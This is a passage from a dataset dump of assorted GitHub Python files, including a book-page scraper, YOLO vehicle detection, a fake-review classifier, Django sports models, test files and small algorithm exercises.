token.\")\n","repo_name":"sdeleers/esloq","sub_path":"webserver/esloq/authentication.py","file_name":"authentication.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33136562149","text":"import requests\nimport os\n\n\nclass TermSpider:\n def __init__(self, book_list):\n self.url_template = \"https://www.termonline.cn/tmbook/1/{}/pages/{}.jpg\"\n self.book_list = book_list\n self.headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"}\n self.base_dir = \"./books\"\n\n def download(self, book_name):\n for i in range(1, 1000):\n try:\n url = self.url_template.format(book_name, i)\n print(url)\n if not os.path.exists(os.path.join(self.base_dir, book_name)):\n os.mkdir(os.path.join(self.base_dir, book_name))\n r = requests.get(url, headers=self.headers, stream=True)\n # 大文件下载\n save_file_name = os.path.join(self.base_dir, book_name, \"{}.jpg\".format(i))\n with open(save_file_name, mode=\"wb\") as f:\n if r.status_code == 200:\n f.write(r.content)\n print(\"下载完成\")\n except Exception as e:\n print(e)\n break\n\n def run(self):\n if not os.path.exists(self.base_dir):\n os.mkdir(self.base_dir)\n for book_name in book_list:\n self.download(book_name)\n\n\nif __name__ == '__main__':\n book_list = [\"农学名词-第一版-1993\",\n \"动物学名词-第一版-1996\",\n \"土壤学名词-第一版-1998\",\n \"医学名词-第一版\"\n ]\n spider = TermSpider(book_list)\n spider.run()\n # url = \"https://www.termonline.cn/tmbook/1/%E5%8A%A8%E7%89%A9%E5%AD%A6%E5%90%8D%E8%AF%8D-%E7%AC%AC%E4%B8%80%E7%89%88-1996/pages/4.jpg\"\n # book_name = \"动物学名词-第一版-1996\"\n # page_num = 4\n\n # spider.download_book(url, book_name, page_num)\n","repo_name":"kenzzuli/hm_15","sub_path":"spider/exercise/term_online_books/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35370746965","text":"import cv2\r\nimport numpy as np\r\n\r\n# Load Yolo\r\nnet = cv2.dnn.readNet(\"yolov3.weights\", \"yolov3.cfg\")\r\nclasses = []\r\nconsidered_classes = ['car','bus','train','truck','bicycle','motorbike']\r\n\r\nwith open(\"coco.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\nlayer_names = net.getLayerNames()\r\noutput_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]\r\ncolors = np.random.uniform(0, 255, size=(len(classes), 3))\r\n\r\n# cap = cv2.VideoCapture('../object_detection/test_videos/video_000.mp4') \r\ncap = cv2.VideoCapture('/home/howdrive/Videos/20201101_142132.mp4') \r\nwhile(True):\r\n ret,all_img=cap.read()\r\n\r\n # Loading image\r\n # cv2.imwrite(\"frame_shape.jpg\",img)\r\n # img = all_img\r\n img = all_img[380:800,:]\r\n\r\n # img = all_img[110:300,600:1023]\r\n\r\n # img = cv2.resize(img, None, fx=0.4, fy=0.4)\r\n height, width, channels = img.shape\r\n\r\n # Detecting objects\r\n blob = cv2.dnn.blobFromImage(img, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n\r\n net.setInput(blob)\r\n outs = net.forward(output_layers)\r\n\r\n # Showing informations on the screen\r\n class_ids = []\r\n confidences = []\r\n boxes = []\r\n for out in outs:\r\n for detection in out:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n confidence = scores[class_id]\r\n if confidence > 0.5 and classes[class_id] in considered_classes:\r\n # Object detected\r\n center_x = int(detection[0] * width)\r\n center_y = int(detection[1] * height)\r\n w = int(detection[2] * width)\r\n h = int(detection[3] * height)\r\n\r\n # Rectangle coordinates\r\n x = int(center_x - w / 2)\r\n y = int(center_y - h / 2)\r\n\r\n boxes.append([x, y, w, h])\r\n confidences.append(float(confidence))\r\n class_ids.append(class_id)\r\n\r\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\r\n # print(indexes)\r\n font = cv2.FONT_HERSHEY_PLAIN\r\n for i in range(len(boxes)):\r\n if i in indexes:\r\n x, y, w, h = boxes[i]\r\n label = str(classes[class_ids[i]])\r\n color = colors[class_ids[i]]\r\n cv2.rectangle(img, (x, y), (x + w, y + h), color, 2)\r\n cv2.putText(img, label, (x, y + 30), font, 3, color, 3)\r\n\r\n\r\n cv2.imshow(\"Image\", img)\r\n k = cv2.waitKey(50) & 0xff\r\n if k == 27: # 'esc' key has been pressed, exit program.\r\n break\r\n\r\ncv2.destroyAllWindows()","repo_name":"CharZakaria/Intersection-Maneuver-reasoning","sub_path":"yolo_object_detection_video.py","file_name":"yolo_object_detection_video.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11608553957","text":"import os\r\nimport pickle\r\nimport nltk\r\nimport numpy as np\r\n\r\nnltk.download('punkt')\r\nnltk.download('stopwords')\r\nnltk.download('maxent_treebank_pos_tagger')\r\nnltk.download('averaged_perceptron_tagger')\r\n\r\ncategories = [\"Books_5\", \"Clothing_Shoes_and_Jewelry_5\", \"Electronics_5\", \"Home_and_Kitchen_5\", \"Kindle_Store_5\",\r\n \"Movies_and_TV_5\", \"Pet_Supplies_5\", \"Sports_and_Outdoors_5\", \"Tools_and_Home_Improvement_5\",\r\n \"Toys_and_Games_5\"]\r\n\r\ncategories_str = \"Clothing_Shoes_and_Jewelry_5\"\r\nfor i in range(1, len(categories)):\r\n categories_str += \", \" + categories[i]\r\n\r\n\r\ndef countvectorize(statement):\r\n vectorizer = pickle.load(open(os.path.join(\"models\", \"vectorizer.pk\"), 'rb'))\r\n statement = vectorizer.transform(statement).toarray()\r\n return statement\r\n\r\n\r\ndef onehotencode(rating, product_category, X):\r\n le_1 = pickle.load(open(os.path.join(\"models\", \"le_1.pk\"), 'rb'))\r\n le_3 = pickle.load(open(os.path.join(\"models\", \"le_3.pk\"), 'rb'))\r\n\r\n col_trans_a = pickle.load(open(os.path.join(\"models\", \"col_trans_a.pk\"), 'rb'))\r\n col_trans_c = pickle.load(open(os.path.join(\"models\", \"col_trans_c.pk\"), 'rb'))\r\n\r\n w = 2\r\n h = 1\r\n column_label_encoding = [[0 for x in range(w)] for y in range(h)]\r\n\r\n for i in range(0, 1):\r\n column_label_encoding[i][0] = rating\r\n\r\n column_label_encoding[i][1] = product_category\r\n\r\n column_label_encoding = np.array(column_label_encoding)\r\n\r\n column_label_encoding[:, 0] = le_3.transform(column_label_encoding[:, 0])\r\n column_label_encoding[:, 1] = le_1.transform(column_label_encoding[:, 1])\r\n\r\n column_label_encoding = col_trans_a.transform(column_label_encoding)\r\n try:\r\n column_label_encoding = column_label_encoding.toarray()\r\n except:\r\n pass\r\n column_label_encoding = column_label_encoding.astype(np.float64)\r\n\r\n\r\n try:\r\n column_label_encoding = column_label_encoding.toarray()\r\n except:\r\n\r\n pass\r\n column_label_encoding = column_label_encoding.astype(np.float64)\r\n\r\n column_label_encoding = col_trans_c.transform(column_label_encoding)\r\n try:\r\n column_label_encoding = column_label_encoding.toarray()\r\n except:\r\n pass\r\n column_label_encoding = column_label_encoding.astype(np.float64)\r\n\r\n X = np.append(X, column_label_encoding, axis=1)\r\n print(len(X))\r\n return X\r\n\r\n\r\ndef get_POS_Tagging(sentence_to_tag):\r\n total_verb_count = 0\r\n total_noun_count = 0\r\n\r\n pos_tags = []\r\n\r\n text = nltk.word_tokenize(sentence_to_tag)\r\n tagged_words_list = (nltk.pos_tag(text))\r\n\r\n for lis in tagged_words_list:\r\n pos_tags.append(lis[1])\r\n\r\n for tag in pos_tags:\r\n if tag in ['NOUN','NNP','NN','NUM','NNS','NP','NNPS']:\r\n total_noun_count += 1\r\n elif tag in ['VERB','VB','VBN','VBD','VBZ','VBG','VBP']:\r\n total_verb_count += 1\r\n else:\r\n continue\r\n\r\n if total_noun_count >= total_verb_count:\r\n sentence_to_tag = 'T'\r\n else:\r\n sentence_to_tag = 'F'\r\n\r\n return sentence_to_tag\r\n\r\n\r\ndef postag(sentence, X):\r\n width = 2\r\n height = 1\r\n\r\n text_pos_tag = []\r\n for i in range(height):\r\n row_list = []\r\n for j in range(width):\r\n row_list.append(0)\r\n text_pos_tag.append(row_list)\r\n\r\n pos_tagged_sentence = get_POS_Tagging(sentence)\r\n\r\n if pos_tagged_sentence == 'T':\r\n text_pos_tag[0][0] = 1\r\n text_pos_tag[0][1] = 0\r\n else:\r\n text_pos_tag[0][0] = 0\r\n text_pos_tag[0][1] = 1\r\n\r\n X = np.append(X, text_pos_tag, axis=1)\r\n return X\r\n\r\n\r\ndef classify(X):\r\n rfc = pickle.load(open(os.path.join(\"models\", \"randomforest.pk\"), 'rb'))\r\n return rfc.predict(X)\r\n\r\n\r\ndef get_result(statement, rating, product_category):\r\n X = countvectorize([statement])\r\n X = postag(statement, X)\r\n X = onehotencode(rating, product_category, X)\r\n\r\n X = classify(X)\r\n return X\r\n\r\n\r\ndef test_input(product_rating, product_category):\r\n x = True\r\n y = True\r\n z = True\r\n\r\n if product_rating != '1' and product_rating != '2' and product_rating != '3' and product_rating != '4' and product_rating != '5':\r\n print()\r\n print()\r\n print(\"\\nError : Rating of a product must be from 1 to 5.\")\r\n print(\"\\nPlease try again\")\r\n\r\n x = False\r\n\r\n if product_category not in categories:\r\n print()\r\n print()\r\n print(\"\\nError : Categories must be one of the following : \\n\" + categories_str)\r\n print(\"\\nPlease try again\")\r\n\r\n z = False\r\n\r\n return [x, y, z]\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n review_text = input(\"\\nPlease type in your review : \")\r\n\r\n product_rating = \"\"\r\n\r\n product_category = \"\"\r\n\r\n input_ar = [False, False, False]\r\n\r\n while (True):\r\n if not input_ar[0]:\r\n product_rating = input(\"\\nPlease enter your rating from 1 to 5 for the product : \")\r\n product_rating = '3'\r\n\r\n if not input_ar[2]:\r\n product_category = 'Home_and_Kitchen_5'\r\n input_ar = test_input(product_rating, product_category)\r\n\r\n if input_ar == [True, True, True]:\r\n break\r\n\r\n answer = get_result(review_text, product_rating, product_category)\r\n\r\n if answer == 1:\r\n print(\"This is an Actual review\")\r\n\r\n else:\r\n print(\"This is a Fake review\")\r\n\r\n\r\n","repo_name":"dmalhot6/cse573_fake_review_detection","sub_path":"test_review.py","file_name":"test_review.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26957064628","text":"from collections import ChainMap\nfrom typing import (\n TYPE_CHECKING,\n Callable,\n Generic,\n Iterable,\n List,\n Mapping,\n MutableMapping,\n NewType,\n Sequence,\n Set,\n TypeVar,\n)\nfrom unittest.mock import Mock\n\nimport pytest\n\nif TYPE_CHECKING:\n from in_n_out import Store\n\nT = TypeVar(\"T\")\n\n\nclass G(Generic[T]):\n ...\n\n\nnt = NewType(\"nt\", int)\nNON_SUBCLASSABLE_TYPES = [\"hi\", nt, List[nt], T, Callable[[int], str], G[int]]\nSUBCLASS_PAIRS = [\n (list, Sequence),\n (tuple, Sequence),\n (dict, Mapping),\n (set, Set),\n (list, Iterable),\n (ChainMap, MutableMapping),\n]\n\n\n@pytest.mark.parametrize(\"type_\", NON_SUBCLASSABLE_TYPES)\n@pytest.mark.parametrize(\"mode\", [\"provider\", \"processor\"])\ndef test_non_standard_types(test_store: \"Store\", type_, mode) -> None:\n mock = Mock(return_value=1)\n if mode == \"provider\":\n test_store.register_provider(mock, type_)\n assert test_store.provide(type_) == 1\n mock.assert_called_once()\n else:\n test_store.register_processor(mock, type_)\n test_store.process(2, type_hint=type_)\n mock.assert_called_once_with(2)\n\n\ndef test_provider_type_error(test_store: \"Store\") -> None:\n with pytest.raises(TypeError, match=\"cannot be used as a provider hint\"):\n test_store.register_provider(lambda: 1, set())\n with pytest.raises(TypeError, match=\"cannot be used as a processor hint\"):\n test_store.register_processor(lambda x: None, set())\n\n\n@pytest.mark.parametrize(\"sub, sup\", SUBCLASS_PAIRS)\n@pytest.mark.parametrize(\"mode\", [\"provider\", \"processor\"])\ndef test_subclass_pairs(test_store: \"Store\", sub, sup, mode) -> None:\n mock = Mock(return_value=1)\n if mode == \"provider\":\n test_store.register_provider(mock, sup)\n assert test_store.provide(sub) == 1\n mock.assert_called_once()\n else:\n test_store.register_processor(mock, sup)\n test_store.process(2, type_hint=sub)\n mock.assert_called_once_with(2)\n\n test_store.clear()\n mock.reset_mock()\n if mode == \"provider\":\n test_store.register_provider(sub, mock)\n assert test_store.provide(sup) is None\n else:\n test_store.register_processor(sub, mock)\n test_store.process(2, type_hint=sup)\n mock.assert_not_called()\n","repo_name":"pyapp-kit/in-n-out","sub_path":"tests/test_type_support.py","file_name":"test_type_support.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"32407682377","text":"import sys\ninput = sys.stdin.readline\n\ndef solution(n, comp):\n\tstack = []\n\ts = \"\"\n\tidx = 0\n\tfor i in range(1, n+1):\n\t\tstack.append(i)\n\t\ts += \"+\\n\"\n\t\twhile stack and stack[-1] == comp[idx]:\n\t\t\tstack.pop()\n\t\t\ts += \"-\\n\"\n\t\t\tidx += 1\n\t\t\t\n\tif stack:\n\t\ts = \"NO\"\n\treturn s\n\n# ==========================================================\n# best time\n# more simple logic\ninput2 = sys.stdin.read\n\ndef sol1874():\n n, *nums = map(int, input2().split())\n cur = 1\n st = []\n answer = []\n for num in nums:\n while cur <= num:\n st.append(cur)\n answer.append('+')\n cur += 1\n if st[-1] != num:\n answer = ['NO']\n break\n st.pop()\n answer.append('-')\n print('\\n'.join(answer))\n\nif __name__ == \"__main__\":\n\tn = int(input())\n\tans = []\n\tfor _ in range(n):\n\t\tans.append(int(input()))\n\tprint(solution(n, ans))\n\t# sol1874()\n\t","repo_name":"kim-mg/algorithm","sub_path":"baekjoon/11 stack/stack_sequence_1874.py","file_name":"stack_sequence_1874.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6182861742","text":"import pytz as pytz\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nimport datetime\n\n\nclass League(models.Model):\n league_name = models.CharField(max_length=50, default='')\n\n class Meta:\n verbose_name = \"League\"\n verbose_name_plural = \"Leagues\"\n\n def clean(self):\n if League.objects.filter(league_name=self.league_name).exists():\n raise ValidationError(\"Error: This league exist.\")\n\n def __str__(self):\n return str(self.league_name)\n\n\nclass Team(models.Model):\n team_name = models.CharField(max_length=50)\n stadium_name = models.CharField(max_length=50)\n coach_name = models.CharField(max_length=50)\n creation_date = models.DateField(null=True)\n game_played = models.PositiveIntegerField(default=0)\n number_of_goals_diffrence = models.IntegerField(default=0)\n number_of_points = models.PositiveIntegerField(default=0)\n league_name = models.ForeignKey(League, on_delete=models.CASCADE, default='')\n add_by = models.CharField(max_length=50)\n\n def clean(self):\n if Team.objects.filter(team_name=self.team_name).exists():\n raise ValidationError(\"Error: This team exist.\")\n if self.creation_date > datetime.date.today():\n raise ValidationError('Error: invalid date.')\n\n class Meta:\n verbose_name = \"Team\"\n verbose_name_plural = \"Teams\"\n\n def __str__(self):\n return self.team_name\n\n\n@receiver(post_save, sender=Team)\ndef create_team_statistic(instance, created, **kwargs):\n if created:\n TeamStatistic.objects.create(team_name=instance.team_name, number_of_points=instance.number_of_points)\n\n@receiver(post_delete, sender=Team)\ndef delete_player_statistic(instance, **kwargs):\n TeamStatistic.objects.filter(team_name=instance.team_name).delete()\n\nclass Player(models.Model):\n PLAYER_POSITION = [\n ('GK', 'Goalkeeper'),\n ('CB', 'Defender'),\n ('CM', 'Midfielder'),\n ('ST', 'Striker'),\n ]\n first_name = models.CharField(max_length=50, default='')\n last_name = models.CharField(max_length=50, default='')\n player_position = models.CharField(max_length=10, choices=PLAYER_POSITION, default='')\n country = models.CharField(max_length=50, choices=pytz.country_names.items(), blank=True, default='')\n number_of_goals = models.PositiveIntegerField(default=0)\n team = models.ForeignKey(Team, on_delete=models.CASCADE, default='')\n link = \"Edit\"\n\n class Meta:\n verbose_name = \"Player\"\n verbose_name_plural = \"Players\"\n\n def __str__(self):\n return str(self.first_name) + ' ' + str(self.last_name)\n\n@receiver(post_delete, sender=Player)\ndef delete_player_statistic(instance, **kwargs):\n PlayerStatistic.objects.filter(pk=instance.pk).delete()\n\n\nclass Match(models.Model):\n home_team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='home_team')\n away_team = models.ForeignKey(Team, on_delete=models.CASCADE, related_name='away_team')\n match_date = models.DateTimeField(null=True)\n queue_number = models.PositiveIntegerField()\n home_team_goals = models.PositiveIntegerField(default='0')\n away_team_goals = models.PositiveIntegerField(default='0')\n status = models.BooleanField(default=False)\n\n def clean(self):\n if self.home_team == self.away_team:\n raise ValidationError(\"Error: Two teams with the same name.\")\n\n class Meta:\n verbose_name = \"Match\"\n verbose_name_plural = \"Matches\"\n\n def __str__(self):\n return str(self.home_team) + \" vs \" + str(self.away_team)\n\n\nclass PlayerStatistic(models.Model):\n PLAYER_CARD = [\n ('--', '------'),\n ('YE', 'Yellow'),\n ('RE', 'Red'),\n ]\n player = models.ForeignKey(Player, on_delete=models.CASCADE, default='')\n match = models.ForeignKey(Match, on_delete=models.CASCADE, default='')\n team_name = models.CharField(max_length=50, blank=True, default='')\n number_of_goals = models.PositiveIntegerField(default=0)\n number_of_assists = models.PositiveIntegerField(default=0)\n number_of_fouls = models.PositiveIntegerField(default=0)\n card = models.CharField(max_length=10, choices=PLAYER_CARD, default='')\n\n class Meta:\n verbose_name = \"PlayerStatistic\"\n verbose_name_plural = \"PlayerStatistics\"\n\n def __str__(self):\n return str(self.card)\n\n\nclass TeamStatistic(models.Model):\n team_name = models.CharField(max_length=50, blank=True, default='')\n game_played = models.PositiveIntegerField(default=0)\n number_of_win = models.PositiveIntegerField(default=0)\n number_of_draw = models.PositiveIntegerField(default=0)\n number_of_losses = models.PositiveIntegerField(default=0)\n number_of_goals_for = models.PositiveIntegerField(default=0)\n number_of_goals_against = models.PositiveIntegerField(default=0)\n number_of_goals_diffrence = models.IntegerField(default=0)\n number_of_points = models.PositiveIntegerField(default=0)\n\n class Meta:\n verbose_name = \"TeamStatistic\"\n verbose_name_plural = \"TeamStatistics\"\n\n\nclass StaticItems(models.Model):\n main_background_image = models.ImageField(blank=True, null=True)\n contact_us_background_image = models.ImageField(blank=True, null=True)\n link = \"Edit\"\n\n class Meta:\n verbose_name = \"StaticItem\"\n verbose_name_plural = \"StaticItems\"\n\n\nclass Search(models.Model):\n address = models.CharField(max_length=50, blank=True, default='')\n\n def __str__(self):\n return self.address\n","repo_name":"kubasmsjk/SneakyPitch","sub_path":"GamePLAY/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25519735687","text":"\nwith open(\"input.txt\", \"r\") as file:\n entries = [int(entry) for entry in file]\n entries = sorted(entries)\n print(entries)\n\ndef adapter(jolts):\n one = 1\n two = 0\n three = 1\n for i in range(len(jolts) - 1):\n diff = jolts[i+1] - jolts[i]\n if diff == 1:\n one = one + 1\n elif diff == 2:\n two = two + 1\n elif diff == 3:\n three = three + 1\n return(one*three)\n\nprint(adapter(entries))\n","repo_name":"mcookhome/advent2020","sub_path":"day10/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10987392605","text":"from classes import RocketBoard\ndef search_for_winning_rocket():\n altitudeList = []\n for rocket in board.rockets:\n altitudeList.append(rocket.altitude)\n\n\n rocketNumber = 1\n listNumerator = 0\n for _ in range(len(altitudeList)):\n if altitudeList[listNumerator] == max(altitudeList):\n print(\"Rocket number: \", rocketNumber, \"WON THE RACE\")\n rocketNumber += 1\n listNumerator += 1\n\n\n# (NUMBER OF ROCKETS, NUMBER OF ROUNDS)\nboard = RocketBoard(5,10)\nsearch_for_winning_rocket()\n\n\nprint(\"Length between Rocket number 1 and Rocket number 2:\", abs(RocketBoard.get_distance(board[0], board[1])))\nprint(\"Length between Rocket number 2 and Rocket number 3:\", abs(RocketBoard.get_distance(board[1], board[2])))\nprint(\"Length between Rocket number 3 and Rocket number 4:\", abs(RocketBoard.get_distance(board[2], board[3])))","repo_name":"marcinkkrk/FirstGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74582016513","text":"n = int(input())\r\narr = list(map(int, input().split()))\r\nx = []\r\nfor i in range(len(arr)):\r\n count = 0\r\n a = []\r\n for j in range(i+1, len(arr)):\r\n if abs(arr[i]-arr[j])<=1:\r\n count += 1\r\n a.append(arr[j])\r\n if count > 1:\r\n a.append(arr[i])\r\n x.append(a)\r\nfor i in x:\r\n if abs(max(i)-min(i))<=1:\r\n print()\r\nprint(x)\r\nprint(max(max(x)))\r\n# print(max(x))\r\n# n = int(input())\r\n# l = list(map(int, input().split()))\r\n# m = []\r\n# x = []\r\n# for i in range(len(l)):\r\n# [m.append(l[i:j]) for j in range(i+1, len(l))]\r\n# print(m)\r\n# for i in m:\r\n# if abs(max(i)-min(i))<=1:\r\n# print(i)\r\n# x.append(len(i))\r\n# print(max(x))","repo_name":"aryanxk02/HackerRank-Solutions","sub_path":"Problem Solving/ACM 1.py","file_name":"ACM 1.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18480761645","text":"from collections import deque\n\nclass Solution:\n def findOrder(self, numCourses: int, prerequisites: [[int]]) -> [int]:\n result = []\n \n indegree = [0] * numCourses\n for node in prerequisites:\n indegree[node[0]] += 1\n \n if 0 not in indegree:\n return []\n \n queue = deque()\n \n for i in range(len(indegree)):\n if indegree[i] == 0:\n queue.append(i)\n \n while queue:\n course = queue.popleft()\n for pre in prerequisites:\n if pre[1] == course:\n indegree[pre[0]] -= 1\n if indegree[pre[0]] == 0:\n queue.append(pre[0])\n \n result.append(course)\n \n return result if not any(indegree) else []","repo_name":"thydrdy/competitive_programming","sub_path":"leetcode/course schedule ii.py","file_name":"course schedule ii.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37476791009","text":"def main():\r\n\ta = 10\r\n\tb = 20\r\n\tprint(\"Initially, a is\", a, \"and b is\", b)\r\n\ta = 10\r\n\ttemp = a\r\n\ta= b\r\n\tb = temp\r\n\tprint(\"After swapping, a is\", a, \"and b is\", b)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"zubairtarif/iNeuron","sub_path":"Programming_Assingment1/Q4.py","file_name":"Q4.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4381212600","text":"import os\nfrom decimal import Decimal\nimport boto3\nfrom boto3.dynamodb.conditions import Key\nfrom iwanttoreadmore.common import get_current_timestamp, hash_string\nfrom iwanttoreadmore.models.vote import get_topic_key\n\n\nclass VoteHistory:\n \"\"\"\n This class contains the logic for retrieving and modifying vote history data\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize a new VoteHistory object, containing a reference to the vote history DynamoDB table\n \"\"\"\n self.votes_history_table = boto3.resource(\"dynamodb\").Table(\n os.environ[\"VOTES_HISTORY_TABLE\"]\n )\n\n def add_vote_history(self, user, project, topic, ip_address):\n \"\"\"\n Add a new vote history entry\n :param user: username\n :param project: topic key\n :param topic: topic key\n :param ip_address: IP address of the user that voted\n \"\"\"\n topic_key = get_topic_key(project, topic)\n\n if not self.check_ip_voted(user, topic_key, ip_address):\n self.votes_history_table.put_item(\n Item={\n \"User\": user,\n \"TopicKey\": topic_key,\n \"VoteTimestamp\": get_current_timestamp(),\n \"IPHash\": hash_string(user + topic_key + ip_address),\n \"IPHashProject\": hash_string(user + project + ip_address),\n }\n )\n\n def get_vote_history(self, user, topic_key):\n \"\"\"\n Get the vote history for a given user and topic key\n :param user: username\n :param topic_key: topic key\n :return: sorted list of vote timestamps of the specified topic key\n \"\"\"\n votes = self.votes_history_table.query(\n IndexName=\"UserTopicKey\",\n ProjectionExpression=\"VoteTimestamp\",\n KeyConditionExpression=Key(\"User\").eq(user)\n & Key(\"Topic_Key\").eq(topic_key),\n )\n\n timestamps = [Decimal(vote[\"VoteTimestamp\"]) for vote in votes[\"Items\"]]\n return sorted(timestamps)\n\n def check_ip_voted(self, user, topic_key, ip_address):\n \"\"\"\n Check if an IP address already voted to the specified user and topic key\n :param user: username\n :param topic_key: topic key\n :param ip_address: IP address to check\n :return: False if the IP address hasn't vote for this topic yet, True otherwise\n \"\"\"\n ip_hash = hash_string(user + topic_key + ip_address)\n\n vote = self.votes_history_table.query(\n ProjectionExpression=\"IPHash\",\n KeyConditionExpression=Key(\"IPHash\").eq(ip_hash),\n )\n\n return len(vote[\"Items\"]) > 0\n\n def check_ip_voted_project(self, user, project, ip_address):\n \"\"\"\n Check if an IP address already voted to the specified user and topic key\n :param user: username\n :param project: project\n :param ip_address: IP address to check\n :return: False if the IP address hasn't vote for this topic yet, True otherwise\n \"\"\"\n ip_hash = hash_string(user + project + ip_address)\n\n vote = self.votes_history_table.query(\n IndexName=\"IPHashProjectIndex\",\n ProjectionExpression=\"IPHashProject\",\n KeyConditionExpression=Key(\"IPHashProject\").eq(ip_hash),\n )\n\n return len(vote[\"Items\"]) > 0\n","repo_name":"haltakov/iwanttoreadmore","sub_path":"api/iwanttoreadmore/models/vote_history.py","file_name":"vote_history.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"21385818949","text":"from odoo import fields,models,api,_\r\n\r\nclass HDTicket(models.Model):\r\n _inherit = 'helpdesk.ticket'\r\n\r\n date_and_time = fields.Datetime('Fecha y hora')\r\n order_date_and_time = fields.Datetime('Fecha y hora de pedido')\r\n jor_id = fields.Many2one(comodel_name='helpdesk.jor', string='JOR')\r\n interaction_id = fields.Many2one(comodel_name='helpdesk.interaccion', string='Interacción')\r\n solution_id = fields.Many2one(comodel_name='helpdesk.soluciones', string='Solución')\r\n store_id = fields.Many2one(comodel_name='helpdesk.tienda', string='Tienda')\r\n call_reason = fields.Many2one(comodel_name='helpdesk.motivo_llamada', string='Motivo de llamada')\r\n supervisor_id = fields.Many2one(comodel_name='helpdesk.supervisor', string='Supervisor')\r\n partner_phone = fields.Char(string='Telefono Cliente', related=\"partner_id.phone\",store=True,readonly=False)\r\n partner_mobile = fields.Char(string='Celular Cliente', related=\"partner_id.mobile\",store=True,readonly=False)\r\n week_number = fields.Selection(string='N° de semana', selection=[\r\n ('0', 'SEMANA 1'),\r\n ('1', 'SEMANA 2'),\r\n ('2', 'SEMANA 3'),\r\n ('3', 'SEMANA 4'),\r\n ('4', 'SEMANA 5'),\r\n ('5', 'SEMANA 6')\r\n ])\r\n\r\n @api.onchange('store_id')\r\n def _onchange_store_id(self):\r\n for record in self:\r\n record.supervisor_id = record.store_id.supervisor_id\r\n record.jor_id = record.store_id.jor_id","repo_name":"janaq/demo_tickets","sub_path":"rockys_helpdesk/models/helpdesk_ticket.py","file_name":"helpdesk_ticket.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36865792476","text":"from random import randint as r_int, uniform as r_unf\nimport csv\nfrom hw09t02_decorators import starting_decor, dump_to_json_dec\n\nSTRINGS_LO_LIM = 10\nSTRINGS_HI_LIM = 100\nCFT_RANGE_LO_LIM = -10\nCFT_RANGE_HI_LIM = 10\nSRC_FILE_NAME = 'tst_cft_src.csv'\nJSON_FILENAME = 'tst_out_file.json'\n\n\ndef gen_csv_rand_nums(file_name: str, tst_mode: bool = True) -> None:\n coefficients_lst = [['No', 'a', 'b', 'c', ], ]\n for i in ([0, 1, 2] if tst_mode else range(r_int(STRINGS_LO_LIM, STRINGS_HI_LIM))):\n coefficients_lst.append([\n i + 1,\n r_unf(CFT_RANGE_LO_LIM, CFT_RANGE_HI_LIM),\n r_unf(CFT_RANGE_LO_LIM, CFT_RANGE_HI_LIM),\n r_unf(CFT_RANGE_LO_LIM, CFT_RANGE_HI_LIM),\n ])\n with open(file_name, 'w', encoding='utf-8') as f_out:\n write_csv = csv.writer(f_out, dialect='excel', delimiter=';')\n write_csv.writerows(coefficients_lst)\n\n\n@starting_decor(SRC_FILE_NAME)\n@dump_to_json_dec(JSON_FILENAME)\ndef square_eq_root(a_cft: float, b_cft: float, c_cft: float) -> [float, tuple[float, float], None]:\n \"\"\"\n Finds roots of square equation\n a * x**2 + b * x + c = 0 -- common equation view\n D=b^2 - 4ac -- equation for discriminant\n x(1,2) = (-b +/- sqrt(D)) / 2a -- equations for roots\n :param a_cft: float -- a coefficient\n :param b_cft: float -- b coefficient\n :param c_cft: float -- c coefficient\n :return: tuple[float, float] -- two roots; float -- one root; None -- no roots\n \"\"\"\n discriminant = b_cft ** 2 - 4 * (a_cft * c_cft)\n if discriminant < 0:\n return 'No real roots'\n x1 = (-b_cft + discriminant ** 0.5) / (2 * a_cft)\n x2 = (-b_cft - discriminant 